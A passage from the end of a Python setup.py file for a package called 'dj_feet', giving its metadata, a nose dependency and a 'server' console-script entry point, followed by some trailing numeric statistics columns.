'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
| 26.44
| 92
| 0.621785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.605144
|